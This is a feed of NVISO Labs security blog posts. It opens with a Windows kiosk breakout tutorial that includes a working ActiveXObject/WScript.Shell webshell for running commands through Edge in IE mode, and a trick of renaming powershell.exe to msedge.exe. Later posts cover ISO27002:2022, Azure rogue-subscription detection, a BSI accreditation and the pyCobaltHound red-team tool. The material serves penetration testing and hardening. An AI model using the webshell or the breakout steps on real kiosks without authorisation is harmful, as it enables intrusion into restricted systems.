✇ NVISO Labs

Breaking out of Windows Kiosks using only Microsoft Edge

By: Firat Acar

Introduction

In this blog post, I will take you through the steps that I performed to get code execution on a Windows kiosk host using ONLY Microsoft Edge. Now, I know that there are many resources out there for breaking out of kiosks and that in general it can be quite easy, but this technique was a first for me.

For those who don’t know, a kiosk is essentially a machine that hosts one or more applications for users with physical access to it (e.g. a reception booth with a screen where guests can register their arrival at a company). The main idea of a kiosk is that users should not be able to do anything on the machine other than use the hosted application(s) in their intended way.

I have to admit, I struggled quite a bit to get code execution on the underlying host, but I was happy that I got there through some creative thinking. I couldn’t find a guide describing a kiosk breakout done the way I did it, which is the reason I wrote this blog post. At the very end, I will also show a quick and easy breakout that I found in a John Hammond video.

Setup

To start things off, I set up my own little Windows kiosk in a virtual machine. I’m not going to detail how to set up a kiosk in this blog post, but here’s a nice little video on YouTube that shows how to set one up yourself.

Our little kiosk

In this configuration, there is a URL bar and a keyboard available, which makes the kiosk escape quite a bit easier, but there are plenty of breakout tactics even without access to the URL bar. I’ll show an example later on.

As you can see, there is no internet access either, so we can’t simply browse to a kiosk pwning website to get an easy win. Furthermore, the Microsoft Edge browser in Windows Kiosk Mode is also restricted in several ways, which means that we can’t tamper with the settings or configurations. More information about the restrictions can be found here.

Escaping Browser Restrictions

First things first, it would be nice to escape the restricted Microsoft Edge browser so we can at least have some breathing room and more options available to us. Before we do this, let’s make use of the web URL bar to browse local directories and see the general structure of the underlying system.

Although this might reveal interesting information, I sadly didn’t find a “passwords.txt” file with the local administrator password on the desktop.

If you use an alternative protocol in a URL bar, the operating system will, in some cases, prompt the user to select an application to execute the operation. Look what happens when we browse to “ftp://something”:

Interesting, right?

We can potentially browse to and select any application to launch this URL with. Sadly, though, Windows kiosk mode is pretty locked down (so far) and only allows Microsoft Edge to run as configured. So let’s select Microsoft Edge as our application. NOTE that you should deselect the “Always use this app” checkbox, otherwise you won’t be able to do this again later: if you leave it selected (which it is by default), you won’t get prompted when trying to use the same protocol again.

Look at that! We now have an unrestricted Microsoft Edge browser to play around with. Before we move on to code execution, let’s take a look at an alternative way we could’ve achieved this without using the URL bar.

So let’s go back to the restricted Edge browser and use some keyboard magic this time. As I said earlier, we’re not going through all methodologies, but you can find a nice cheat sheet here and a blog post by TrustedSec over here.

In the restricted Edge browser, you can use keyboard combinations like “ctrl+o” (open file), “ctrl+s” (save file) and “ctrl+p” (print file) to launch an Explorer window. With the “ctrl+p” method, you’d also need to select “Microsoft Print to PDF” and then click the “Print” button to spawn the Explorer window. Let’s use “ctrl+o”:

And here it is: a nice way to spawn a new unrestricted Edge browser by simply entering “msedge.exe” in the toolbar and pressing enter. At this point, I also tried to spawn “cmd.exe” and similar binaries, but everything else was blocked by the kiosk configuration.

Gaining Code Execution

To gain code execution with the new, unrestricted Edge browser, I had to resort to some creative thinking. I already knew plain old JavaScript wasn’t going to execute shell commands for me unless Node.js was installed on the system (spoiler alert: it wasn’t), so I started looking for something else.

After Googling around for a bit on how to execute shell commands using JavaScript, I came across the following post on Stack Overflow, which details how we could use ActiveXObject to execute shell commands on Windows operating systems.

Bingo? Not quite yet, as there’s a catch. Shell-executing mechanisms in JavaScript, such as ActiveXObject, do not work in Microsoft Edge, as they are quite insecure. I still tried it out, but the commands indeed did not execute. At this point, it became clear to me that I either had to find another route or dig deeper into how ActiveXObject and Microsoft Edge work.

Another round of Googling brought me to yet another post, which touches on the subject of running ActiveXObject via Microsoft Edge. One answer piqued my interest immediately:

Apparently, there’s a way to run Microsoft Edge in Internet Explorer mode? I had never heard of this before, as I usually don’t use Edge myself. Nevertheless, I looked further into this using Google and the unrestricted Edge browser that we spawned earlier.

So here’s how we’re going to run Microsoft Edge in Internet Explorer mode, but let’s go through it step by step. First, in our unrestricted Edge browser, we will go to Settings > Default browser:

Here, we can set “Allow sites to be reloaded in Internet Explorer mode” to “Allow” and we can also already add the full path to our upcoming webshell in the “Internet Explorer mode pages” tab. We can only save documents to our own user’s downloads folder, so that seems like a good location to store a “pwn.html” webshell. Note that “pwn.html” does not exist yet, we will create it later.

If we now click the blue restart button, there’s only one thing left to do, and that’s getting the actual code into an HTML file on disk without using a text editor like Notepad. Some quick thinking led me to the idea of using the developer console to change the current page’s HTML code and then save the page to disk.

First, just to be sure, we need to get rid of any other HTML/JavaScript code that might interfere with our own. Go ahead and delete pretty much everything on the page, except the already existing <html> and <body> tags. We will then write the webshell code snippet displayed below in the developer console:

<script>
    // Requires Internet Explorer mode: ActiveXObject is not available in regular Edge.
    function shlExec() {
        // Read the command typed into the form field.
        var cmd = document.getElementById('cmd').value
        // WScript.Shell exposes the Exec method to spawn processes.
        var shell = new ActiveXObject("WScript.Shell");
        try {
            // Run the command via cmd.exe and capture the process handle.
            var execOut = shell.Exec("cmd.exe /C \"" + cmd + "\"");
            // Read the command's standard output and show it in an alert box.
            var out = execOut.StdOut.ReadAll();
            alert(out);
        } catch (e) {
            console.log(e);
        }
    }
</script>

<form onsubmit="shlExec()">
    Command: <input id="cmd" name="cmd" type="text">
    <input type="submit">
</form>

Once all the default Edge clutter is removed, the page source should look something like this:

Let’s save this page (ctrl+s or via menu) as “pwn.html” as we planned earlier and then browse to it.

Notice the popup prompt at the bottom of the page asking us to allow blocked content. We’ll go ahead and allow said content. If we now use our little webshell to execute commands:

We will need to approve this popup window every time we execute a command, but look what we get after we accept!

So yeah, all of this takes quite a bit of effort, but at least it’s another way of gaining command execution on a kiosk system using only Microsoft Edge.

Alternative Easy Path

It was only after the project ended that I came across a YouTube video from John Hammond in which he completely invalidates my efforts and gets code execution in a much simpler way. Honestly, I can’t believe I didn’t think of this before.

Starting from an unrestricted browser, one can simply download “powershell.exe” from “C:\Windows\System32\WindowsPowerShell\v1.0”.

Then, in the downloads folder, rename “powershell.exe” to “msedge.exe” and execute it.

Something like this could be fixed by only allowing Edge to run from its original, full path, but at the time of writing this blog post it still works on the newest Windows 11 kiosk mode.

Mitigation

As for mitigating kiosk breakouts like these, there are a few things that I can advise you to help prevent them. Note that this is not a complete list.

  • If possible, hide the URL bar completely to prevent the alternative protocol escape. If hiding the URL bar is not an option, look into pre-selecting the applications for alternative protocols with the “Always use this app” checkbox.
  • Disable or remap keys like Ctrl and Alt. It’s also possible to provide a keyboard that doesn’t have these keys.
  • Enable AppLocker to only allow applications to run from whitelisted locations, such as “C:\Program Files”. Keep in mind that AppLocker can easily be misconfigured and then bypassed, so configure it quite strictly for kiosks.
  • Configure Microsoft Edge in the following ways:
    • Computer Configuration > Administrative Templates > Windows Components > Microsoft Edge > Enable “Prevent access to the about:flags page in Microsoft Edge”
    • Block access to “edge://settings”, you could do this by editing the local kiosk user’s Edge settings before deploying the kiosk mode itself

References

Microsoft – Configure Microsoft Edge kiosk mode

https://docs.microsoft.com/en-us/deployedge/microsoft-edge-configure-kiosk-mode

Github – Kiosk Example Page

https://github.com/KualiCo/kiosk

Pentest Diary – Kiosk breakout cheatsheet

http://pentestdiary.blogspot.com/2017/12/kiosk-breakout-cheatsheet.html

Trustedsec – Kiosk breakout keys in Windows

https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/

Youtube – How to set up Windows Kiosk Mode

https://www.youtube.com/watch?v=4dEYKLxXBxE

John Hammond – Kiosk Breakout

https://youtu.be/aBMvFmoMFMI?t=1385

Stack Overflow – JavaScript shell execution

https://stackoverflow.com/questions/44825859/get-output-on-shell-execute-in-js-with-activexobject

Microsoft – ActiveXObject in Microsoft Edge

https://answers.microsoft.com/en-us/microsoftedge/forum/all/enable-activex-control-in-microsoft-edge-latest/979e619d-f9f2-47da-9e7d-ffd755234655

Browserhow – Microsoft Edge in IE Mode

https://browserhow.com/how-to-enable-and-use-ie-mode-in-microsoft-edge/

Super User – Disable Shortcut Keys

https://superuser.com/questions/1131889/disable-all-keyboard-shortcuts-in-windows

About The Author

Firat is a red teamer in the NVISO Software Security & Assessments team, focusing mostly on Windows Active Directory, malware and tools development, and internal/external infrastructure pentests.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

What ISO27002 has in store for 2022

By: Nick Van den Bossche

In current times, security measures have become increasingly important for the continuity of our businesses, to guarantee the safety for our clients and to confirm our company’s reputation.

While thinking of security, our minds will often jump to the ISO/IEC 27001:2013 and ISO/IEC 27002:2013 standards. Especially in Europe and Asia, these have been the leading standards for security since, well… 2013. As of 2022, things will change: ISO has recently published ISO/IEC 27002:2022 and is planning to release ISO/IEC 27001:2022 later this year. However, little to no changes are expected in ISO/IEC 27001:2022 beyond amending its Annex A to reflect the new control structure of ISO/IEC 27002:2022.

No ISO standard stands on its own. This means that, by extension, the new releases will affect various other standards, including ISO/IEC 27017, ISO/IEC 27018 and ISO/IEC 27701. So make sure to keep an eye on the new ISO/IEC 27001/27002 releases if you are certified against any of those as well.

“The new ISO this, the new ISO that”: By now you are probably wondering what they actually added, changed and removed. We’ve got you covered.

Let’s begin with the document’s new title, “Information security, cybersecurity and privacy protection – Information security controls”, replacing the previous iterations’ “Code of practice for information security controls”. The change in title seems to acknowledge that there is a difference between information security and cybersecurity, and adds data privacy to the topics covered by the standard.

Content-wise, the main changes introduced in ISO/IEC 27002:2022 revolve around the structure of the available controls, meaning the way these are organized within the standard itself. The reorganization of the controls aims to bring the standard in line with the current cyber threat landscape: the efficiency of the standard has been increased by merging certain high-level controls into a single control and by introducing more specific ones.

In particular, the controls have been re-grouped into four main categories, instead of the fourteen found in the 2013 version. These categories are as follows:

  • 5. Organizational controls (37 controls)
  • 6. People controls (8 controls)
  • 7. Physical controls (14 controls)
  • 8. Technological controls (34 controls)

On top of that, the total number of controls has been trimmed down from one hundred and fourteen in the previous version to ninety-three. And this is not the end of the efficiency improvements: both for reading and for analysing the standard, the introduction of complementary tagging will certainly help you out during the implementation and preparation leading up to your certification. The following families of tags (attributes) are being introduced:

  • Control type (preventive, detective, corrective)
  • Information security properties (confidentiality, integrity, availability)
  • Cybersecurity concepts (identify, protect, detect, respond, recover)
  • Operational capabilities
  • Security domains

As mentioned above, ISO has done a fair bit of trimming of the controls, but this was not limited to removing controls or combining multiple controls into one: ISO/IEC 27002:2022 also introduces twelve new controls. These controls reflect ISO’s intention to have this latest version cover some of the most important technology trends with a strong relation to security, as reflected in the new title as well. Examples are threat intelligence, cloud services and data privacy, of which the latter two are also covered by separate ISO standards, ISO/IEC 27017 and ISO/IEC 27701 respectively.

Why does including these controls in ISO/IEC 27002:2022 matter for the new trends in cybersecurity? One explanation is the ever-growing threat landscape: the increase in high-impact vulnerabilities, like the Log4j issues we have seen in the past few months, drives the need to update ISO/IEC 27002. A second explanation lies in the demand for increased interoperability between ISO standards, achieved by unifying the controls and adding the aforementioned tagging system.

Proof of this interoperability can also be found if we take a look at operational capabilities such as Asset Management (Classification of Information and Asset Handling). These already implicitly covered data privacy and threat intelligence in the 2013 version, topics which are now more prevalent among the controls in the new release. As with Asset Management, Access Control (including its Logging & Monitoring and Access Management) is also affected by the introduction of the new cloud-related controls.

The interoperability is not limited to ISO either. Many of the operational capabilities covered by the ISO/IEC 27001 controls are also covered by controls that are part of other certifications, like PCI DSS, NIST, QTSP (ETSI), SWIFT and ISAE 3402. This is not to say that you should not aim for an ISO certification if your company already holds one or more of those other certifications. Certifying to ISO/IEC 27001 should go rather smoothly if you already have a framework in place from a different certification, and there is no harm in improving your company’s security.

The ISO controls can offer an entirely new approach to mitigate certain risks that you would not have thought of otherwise. If you have the resources to expand your list of certifications with ISO/IEC 27001:2022, we can only recommend doing so and adding an extra layer of defence to your security framework.

We can already see some of you worry: “We’ve only recently been certified to ISO/IEC 27001!” or “We are in the middle of the audit, but it won’t be over by the time the new ISO/IEC 27001 releases – is all that effort wasted?”. We can assure you that there is no reason to panic. Only when ISO/IEC 27001:2022 is released will the ISO accreditation bodies be able to start certifying against it, as part of the standard 3-year audit cycle defined by ISO. Moreover, companies will be granted a period to fully comprehend and adapt to the new standard before undergoing the audit for recertification, and ISO surveillance / (re)certification audits are not expected to use the new ISO/IEC 27001:2022 version for at least 1 year after its public release.

Whether you are starting your endeavour to become ISO/IEC 27001 certified or want to begin transitioning your current ISO/IEC 27001:2013 certification to the new 2022 flavour, know that NVISO is there to help you! NVISO has developed a proven service to become ISO certified for new adopters, as well as an “ISO quick scan” for companies already holding the 2013 certification, with which we assist and kickstart your transition to the ISO/IEC 27001:2022 certification.

✇ NVISO Labs

Detecting & Preventing Rogue Azure Subscriptions

By: Maxime Thiebaut

A few weeks ago, NVISO observed how a phishing campaign resulted in a compromised user creating additional attacker infrastructure in their Azure tenant. While most of the malicious operations were flagged, we were surprised by the lack of logging and alerting on Azure subscription creation.

Creating a rogue subscription has a couple of advantages:

  • By default, all Azure Active Directory members can create new subscriptions.
  • New subscriptions can also benefit from a trial license granting attackers $200 worth of credits.
  • By default, even global administrators have no visibility over such new subscriptions.

In this blog post we will cover why rogue subscriptions are problematic and revisit a solution published a couple of years ago on Microsoft’s Tech Community. Finally, we will conclude with some hardening recommendations to restrict the creation and importation of Azure subscriptions.

Don’t become ‘that’ admin…

The deployments and recommendations discussed throughout this blog post require administrative privileges in Azure. As with any administrative actions, we recommend you exercise caution and consider any undesired side-effects privileged changes could cause.

With the above warning in mind, global administrators in a hurry can directly deploy the logging of available subscriptions (and read the hardening recommendations)…

Deploy to Azure

Azure’s Hierarchy

To understand the challenges behind logging and monitoring subscription creation, one must first understand what Azure’s hierarchy looks like.

In Azure, resources such as virtual machines or databases are logically grouped within resource groups. These resource groups act as logical containers for resources with a similar purpose. To invoice the usage of these resources, resource groups are part of a subscription, which also defines quotas and limits. Finally, subscriptions are part of management groups, which provide centralized management for access, policies and compliance.

Figure 1: Management levels and hierarchy in “Organize your Azure resources effectively” on docs.microsoft.com.

Most Azure components are resources, and this is also the case with monitoring solutions. As an example, creating an Azure Sentinel instance requires the prior creation of a subscription. This core hierarchy implies that monitoring and logging are commonly scoped to a specific set of subscriptions, as can be seen when creating alert rules.

Figure 2: Alert rules and their scope selection limited to predefined subscriptions in the Azure portal.

This Azure hierarchy creates a chicken-and-egg problem: monitoring for subscription creation requires prior knowledge of the subscription.

Another small yet non-negligible Azure detail is that, by default, even global administrators cannot view all subscriptions. As detailed in “Elevate access to manage all Azure subscriptions and management groups“, viewing all subscriptions first requires additional elevation through the Azure Active Directory properties, followed by unchecking the global subscription filter.

Figure 3: The Azure Active Directory access management properties.
Figure 4: The global subscriptions filter enabled by default in the Azure portal.

The following image slider shows the view prior (left) and after (right) the above elevation and filtering steps have been taken.

Figure 5: Subscriptions before (left) and after (right) access elevation and filter removal in the Azure portal.

In the compromise NVISO observed, the rogue subscriptions were all named “Azure subscription 1”, matching the default name enforced by Azure when leveraging free trials (as seen in the above figure).

Detecting New Subscriptions

A few years ago, a Microsoft Tech Community blog post covered this exact challenge and solved it through a logic app. The following section revisits that solution with a slight variation using Azure Sentinel and system-assigned identities. Through a simple logic app, one can store the list of subscriptions in a Log Analytics workspace, on which an alert rule can then be set up to flag new subscriptions.

Deploy to Azure

Collecting the Subscription Logs

The first step in collecting the subscription logs is to create a new empty logic app (see the “Create a Consumption logic app resource” documentation section for more help). Once created, ensure the logic app has a system-assigned identity enabled from its identity settings.

Figure 6: A logic app’s identity settings in the Azure portal.

To grant the logic app reader access to the Azure Management API, go to the management groups and open the “Tenant Root Group”.

Figure 7: The management groups in the Azure portal.

Within the “Tenant Root Group”, open the access control (IAM) settings and click “Add” to add a new access.

Figure 8: The tenant root group’s access control (IAM) in the Azure portal.

From the available roles, select the “Reader” role which will grant your logic app permissions to read the list of subscriptions.

Figure 9: A role assignment’s role selection in the Azure portal.

Once the role is selected, assign it to the logic app’s managed identity.

Figure 10: A role assignment’s member selection in the Azure portal.

When the logic app’s managed identity is selected, feel free to document the role assignment’s purpose and press “Review + assign”.

Figure 11: A role assignment’s member selection overview in the Azure portal.

With the role assignment performed, we can move back to the logic app and start building the logic to collect the subscriptions. From the logic app’s designer, select a “Recurrence” trigger which will trigger the collection at a set interval.

Figure 12: An empty logic app’s designer tool in the Azure portal.

While the original Microsoft Tech Community blog post used an hourly recurrence, we recommend lowering that value (e.g. to 5 minutes, the fastest interval for alerting), given we observed the rogue subscriptions being abused rapidly.

Figure 13: A recurrence trigger in a logic app’s designer tool.

With the trigger defined, click the “New step” button to add an operation. To retrieve the list of subscriptions, search for, and select, the “Azure Resource Manager List Subscriptions” action.

Figure 14: Searching for the Azure Resource Manager in a logic app’s designer tool.

Select your tenant and proceed to click “Connect with managed identity” to have the authentication leverage the previously assigned role.

Figure 15: The Azure Resource Manager’s tenant selection in a logic app’s designer tool.

Proceed by naming your connection (e.g.: “List subscriptions”) and validate the managed identity is the system-assigned one. Once done, press the “Create” button.

Figure 16: The Azure Resource Manager’s configuration in a logic app’s designer tool.

With the subscriptions retrieved, we can add another operation to send them to a Log Analytics workspace. To do so, search for, and select, the “Azure Log Analytics Data Collector Send Data” operation.

Figure 17: Searching for the Log Analytics Data Collector in a logic app’s designer tool.

Setting up the “Send Data” action requires the target Log Analytics’ workspace ID and primary key. These can be found in the Log Analytics workspace’s agents management settings.

Figure 18: A log analytics workspace’s agent management in the Azure portal.

In the logic app designer, name the Azure Log Analytics Data Collector connection (e.g.: “Send data”) and provide the target Log Analytics’ workspace ID and primary key. Once done, press the “Create” button.

Figure 19: The Log Analytics Data Collector’s configuration in a logic app’s designer tool.

We can then select the JSON body to send. As we intend to store the individual subscriptions, look for the “Item” dynamic content which will contain each subscription’s information.

Figure 20: The Log Analytics Data Collector’s JSON body selection in a logic app’s designer tool.

Upon selecting the “Item” content, a loop will automatically encapsulate the “Send Data” operation to cover each subscription. All that remains to be done is to name the custom log, which we’ll call “SubscriptionInventory”.

Figure 21: The encapsulation of the Log Analytics Data Connector in a for-each loop as seen in a logic app’s designer tool.

Once this last step is configured, the logic app is ready and can be saved. After a few minutes, the new custom SubscriptionInventory_CL table will start getting populated.
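
As a point of reference for what the logic app collects, the following minimal Python sketch (our own illustration, not part of the original Tech Community solution) enumerates the same subscription inventory. It assumes the azure-identity and azure-mgmt-resource packages are installed and that the executing identity has Reader rights on the tenant root group.

from azure.identity import DefaultAzureCredential
from azure.mgmt.resource import SubscriptionClient


def list_subscriptions():
    """Enumerate all subscriptions visible to the authenticated identity."""
    credential = DefaultAzureCredential()  # service principal, managed identity or az login
    client = SubscriptionClient(credential)
    return [
        {
            "SubscriptionId": subscription.subscription_id,
            "DisplayName": subscription.display_name,
            "State": str(subscription.state),
        }
        for subscription in client.subscriptions.list()
    ]


if __name__ == "__main__":
    # Print one line per subscription, mirroring the fields sent to SubscriptionInventory_CL
    for subscription in list_subscriptions():
        print(subscription)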

Alerting on New Subscriptions

While collecting the logs was the hard part, the last remaining step is to create an analytics rule to flag new subscriptions. As an example, the following KQL query identifies new subscriptions and is intended to run every 5 minutes.

// Interval at which the analytics rule runs
let schedule = 5m;
SubscriptionInventory_CL
// Keep the earliest record per subscription, i.e. when it was first inventoried
| summarize arg_min(TimeGenerated, *) by SubscriptionId
// Only alert on subscriptions first seen within the last run interval
| where TimeGenerated > ago(schedule)

A slightly more elaborate query variant, taking base-lining and delays into account, is available either packaged within the complete ARM (Azure Resource Manager) template or as a standalone rule template.

Once the rule is deployed, new subscriptions will result in incidents being created, as shown below. These incidents provide the much-needed signal to identify potentially rogue subscriptions prior to their abuse.

Figure 22: A custom “Unfamiliar Azure subscription creation” incident in Azure Sentinel.

To empower your security team to investigate such events, we recommend granting them Reader rights on the “Tenant Root Group” management group to ensure these rights are inherited by new subscriptions.

Hardening an Azure Tenant

While logging and alerting are great, preventing an issue from taking place is always preferable. This section provides some hardening options that Azure administrators might want to consider.

Restricting Subscription Creation

Azure users are by default authorized to sign up for cloud services and have an identity automatically created for them, a process called self-service sign-up. As we saw throughout this blog post, this opens an avenue for free trials to be abused. This setting can however be controlled by an administrator through the Set-MsolCompanySettings cmdlet’s AllowAdHocSubscriptions parameter.

AllowAdHocSubscriptions controls the ability for users to perform self-service sign-up. If you set that parameter to $false, no user can perform self-service sign-up.

docs.microsoft.com

As such, after careful consideration, Azure administrators can prevent users from signing up for services (incl. free trials) through the following MSOnline PowerShell command:

Set-MsolCompanySettings -AllowAdHocSubscriptions $false

Restricting Management Group Creation

Another Azure component users should not usually interact with is management groups. As stated previously, management groups provide centralized management for access, policies and compliance, and act as a layer above subscriptions.

By default, any Azure AD security principal has the ability to create new management groups. This can however be hardened in the management group settings to require the Microsoft.Management/managementGroups/write permission on the root management group.

Figure 23: The management groups settings in the Azure portal.

Restricting Subscriptions from Switching Azure AD Directories

One final avenue of exploitation which we haven’t seen being abused so far is the transfer of subscriptions into or from your Azure Active Directory environment. As transferring subscriptions poses a governance challenge, the subscriptions’ policy management portal offers two policies capable of prohibiting such transfers.

We highly encourage Azure administrators to consider enforcing these policies.

Figure 24: The subscriptions’ policies in the Azure portal.

Conclusions

In this blog post we saw how Azure’s default of allowing anyone to create subscriptions poses a governance risk. This weak configuration is actively being leveraged by attackers gaining access to compromised accounts.

We revisited a solution initially published on Microsoft’s Tech Community and proposed slight improvements to it alongside a ready-to-deploy ARM template.

Finally, we listed some recommendations to harden these weak defaults to ensure administrative-like actions are restricted from regular users.


You want to move to the cloud, but have no idea how to do this securely?
Having problems applying the correct security controls to your cloud environment?

✇ NVISO Labs

NVISO approved as APT Response Service Provider

By: Sebastian Tischer

NVISO is proud to announce that it has successfully qualified as an APT Response service provider and is now recommended on the website of the German Federal Office for Information Security (BSI).  

Advanced Persistent Threats (APT) are typically described as attack campaigns in which highly skilled, often state-sponsored, intruders orchestrate targeted, long-term attacks. Due to their complex nature, these types of attacks pose a serious threat to any company or organisation.  

The main purpose of the German Federal Office for Information Security (BSI) is to provide advice and support to operators of critical infrastructure and to recommend qualified incident response service providers that comply with its strict quality requirements.

It is with great pride that we can now confirm that NVISO has passed the rigorous BSI assessment and we are thus listed as a recommended APT Response service provider.  

To attain the coveted BSI recommendation, we had to demonstrate the quality of the service offered by NVISO.  

This included amongst others:  

  • 24×7 readiness and availability of the incident response team  
  • An ISO27001 certification covering the entire organisation  
  • The ability to perform malware analysis and forensics (on hosts and on the network) 
  • Our experts spent multiple hours in interview sessions where they showcased their experience and expertise in dealing with cyber threats.  

NVISO is already a European cyber security powerhouse employing a variety of world-class experts (e.g. SANS instructors, SANS authors and forensic tool developers), and this new recognition further highlights its position as a leading European player that can deliver world-class cyber security services.

Next to our incident response services, NVISO can also help you improve your overall cyber security posture before an incident happens. Our services span a variety of security consulting and managed security services.  

Please don’t hesitate to get in touch!  

[email protected] 
+49 69 9675 8554  

  

About NVISO  

Our mission is to safeguard the foundations of European society from cyber-attacks.  

NVISO is a pure-play cyber security services firm founded in 2013. Over 150 specialized security experts in Belgium, Germany, Austria and Greece help to make our mission a reality.  

GERMAN VERSION

NVISO is proud to announce that, following a successful assessment by the German Federal Office for Information Security (BSI), we are listed as a qualified APT response service provider.

Advanced Persistent Threats (APT) are targeted cyber attacks carried out over an extended period of time. They frequently originate from highly trained, state-controlled attackers. Due to their complexity, they pose a serious threat to any company or institution.

The main task of the German Federal Office for Information Security (BSI) is to advise operators of critical infrastructure and to recommend qualified incident response service providers.

It is with great pride that we can now announce that NVISO has successfully completed the demanding qualification process and is listed as a recommended APT response service provider on the website of the German Federal Office for Information Security (BSI).

NVISO’s service quality convinced the BSI on the basis of the following criteria, upon which it issued the coveted recommendation:

  • 24×7 readiness of the incident response team
  • ISO27001 certification covering the entire organisation
  • Execution of malware analysis as well as host and network forensics
  • Our experts were interviewed for several hours about their skills and experience in dealing with cyber threats

We are proud that world-class experts work at NVISO (including SANS instructors, SANS authors and developers of forensic tools). The BSI recommendation further underlines NVISO’s position as a true European player.

NVISO offers a wide range of outstanding cyber security services. With targeted consulting and managed security services, we help improve your overall security posture – before incidents happen.

  

We look forward to your inquiry!

[email protected]
+49 69 9675 8554  

  

About NVISO

Our mission is to safeguard the foundations of European society from cyber attacks. NVISO was founded in 2013 as a pure-play cyber security company. More than 150 experts in Germany, Austria, Belgium and Greece are now working to make our mission a reality.



✇ NVISO Labs

Introducing pyCobaltHound – Let Cobalt Strike unleash the Hound

By: Adriaan Neijzen

Introduction

During our engagements, red team operators often find themselves operating within complex Active Directory environments. The question then becomes how to find the needle in the haystack that allows the red team to further escalate and/or reach their objectives. Luckily, the security community has already come up with ways to assist operators in answering these questions, one of them being BloodHound. Having a BloodHound collection of the environment you are operating in, if OPSEC allows for it, often gives a red team a massive advantage.

As we propagate laterally throughout these environments and compromise key systems, we tend to compromise a number of users along the way. We therefore find ourselves running the same Cypher queries for each user (e.g. “Can this user get me Domain Admin?” or “Can this user help me get to my objective?”). After all, you never know: there could have been a Domain Admin logged in to one of the workstations or servers you just compromised.

This led us to pose the question: “Can we automate this to simplify our lives and improve our situational awareness?”

To answer our question, we developed pyCobaltHound, which is an Aggressor script extension for Cobalt Strike aiming to provide a deep integration between Cobalt Strike and BloodHound.

Meet pyCobaltHound

You can’t release a tool without a fancy logo, right?

pyCobaltHound strives to assist red team operators by:

  • Automatically querying the BloodHound database to discover escalation paths opened up by newly collected credentials.
  • Automatically marking compromised users and computers as owned.
  • Allowing operators to quickly and easily investigate the escalation potential of beacon sessions and users.

To accomplish this, pyCobaltHound uses a set of built-in queries. Operators are also able to add/remove their own queries to fine tune pyCobaltHound’s monitoring capabilities. This grants them the flexibility to adapt pyCobaltHound on the fly during engagements to account for engagement-specific targets (users, hosts, etc.).

The pyCobaltHound repository can be found on the official NVISO Github page.

Credential store monitoring

pyCobaltHound’s initial goal was to monitor Cobalt Strike’s credential cache (View > Credentials) for new entries. It does this by reacting to the on_credentials event that Cobalt Strike fires when changes to the credential store are made. When this event is fired, pyCobaltHound will:

  1. Parse and validate the data received from Cobalt Strike
  2. Check if it has already investigated these entities by reviewing its cache
  3. Add the entities to a cache for future runs
  4. Check if the entities exist in the BloodHound database
  5. Mark the entities as owned
  6. Query the BloodHound database for each new entity using both built-in and custom queries.
  7. Parse the returned results, notify the operator of any interesting findings and write them to a basic HTML report.

Since all of this takes place asynchronously from the main Cobalt Strike client, this process should not block your UI, so you can keep working while pyCobaltHound investigates away in the background. If any of the queries pyCobaltHound was configured with returns objects, it will notify the operator.

pyCobaltHound returning the number of hits for each query

If asked, pyCobaltHound will also output a simple HTML report where it will group the results per query. This is recommended, since this will allow the operator to find out which specific accounts they should investigate.

A sample pyCobaltHound report

Beacon management

After implementing the credential monitoring, we also enabled pyCobaltHound to interact with existing beacon sessions.

This functionality is especially useful when dealing with users and computers whose credentials have not been compromised (yet), but that are effectively under our control (e.g. because we have a beacon running under their session token).

This functionality can be found in the beacon context menu. Note that these commands can be executed on a single beacon or a selection of beacons.

Mark as owned

The Mark as owned functionality (pyCobaltHound > Mark as owned) can be used to mark a beacon (or collection of beacons) as owned in the BloodHound database.

Investigation

The Investigate functionality (pyCobaltHound > Investigate) can be used to investigate the users and hosts associated with a beacon (or collection of beacons).

In both cases, both the user and the computer associated with the beacon context will be marked as owned or investigated. Before it marks/investigates a computer, pyCobaltHound will check if the computer account can be considered “owned”. To do so, it checks if the beacon session is running as local admin, SYSTEM or as a high-integrity session of another user. This behaviour can however be changed on the fly.

Entity investigation

In addition to investigating beacon sessions, we also implemented the option to freely investigate entities. This can be found in the main menu (Cobalt Strike > pyCobaltHound > Investigate).

This functionality is especially useful when dealing with users and computers whose credentials have not been compromised and are not under our control. We mostly use it to quickly identify if a specific account will help us reach our goals by running it through our custom pathfinding queries. A good use case is investigating each token on a compromised host to see if any of them are worth impersonating.

Standing on the shoulders of giants

pyCobaltHound would not have been possible without the great work done by dcsync in their pyCobalt repository. The git submodule that pyCobaltHound uses is a fork of their work with only some minor fixes done by us.

About the author

Adriaan is a senior security consultant at NVISO specialized in the execution of red teaming, adversary simulation and infrastructure related assessments.

✇ NVISO Labs

Girls Day at NVISO Encourages Young Guests To Find Their Dream Job

By: Carola Wondrak

NVISO employees in Frankfurt and Munich showcased their work in cybersecurity to the girls with live hacking demos, a view behind the scenes of NVISO and hands-on tips for their personal online security. By participating in the Germany-wide “Girls Day”, we widened the field of future career choices for the young visitors and steered them away from the idea of “stereotypical male jobs”.

Everyone and their dog knows that diversity is not just a nice gimmick: it has a positive impact on the success of companies. “Delivering through Diversity”, a 2018 study by McKinsey, reported that companies with gender-diverse teams are much more likely to make decisions that result in financial returns above their industry mean.

While the first programmers were women, the reality today is that cybersecurity is a field with more employees who identify as male than female. The image of a typical IT geek in a hoodie in front of a PC may come to mind. But what is also true nowadays is that IT companies are looking for great new hires, independently of their gender. Given that young women statistically do better in German schools, there should be plenty of great female employees – if they pursued careers in STEM-related fields. Breaking into a new field is hard, but it gets easier when you see others doing it. For girls interested in STEM-related fields, it is valuable to have role models like our employees. This is why we at NVISO took the Girls Day initiative to heart and participated this week, to be an active part of a change that we see as fundamental.

Girls Day is an initiative that started in 2001 and can be seen as a one-day internship in technical jobs for girls. On the same day, a Boys Day takes place to encourage boys to explore career options in care or social jobs. Girls Day is supported and sponsored by the federal ministries BMFSFJ and BMBF, which promote it throughout Germany and make it possible for interested girls to miss school on the day they visit companies.

Over the last 20 years, the initiative has not only grown its target group; it is now also the project with the most participants and is acknowledged worldwide, with enthusiasts all over the globe helping to fight the stereotypes that shape “typical” career choices. According to “Datenbasis: Evaluationsergebnisse 2021” by the founders of Girls Day, Kompetenzzentrum Technik-Diversity-Chancengleichheit e.V., 72% of the 2021 participants said attending that day was helpful for learning about possible future jobs.

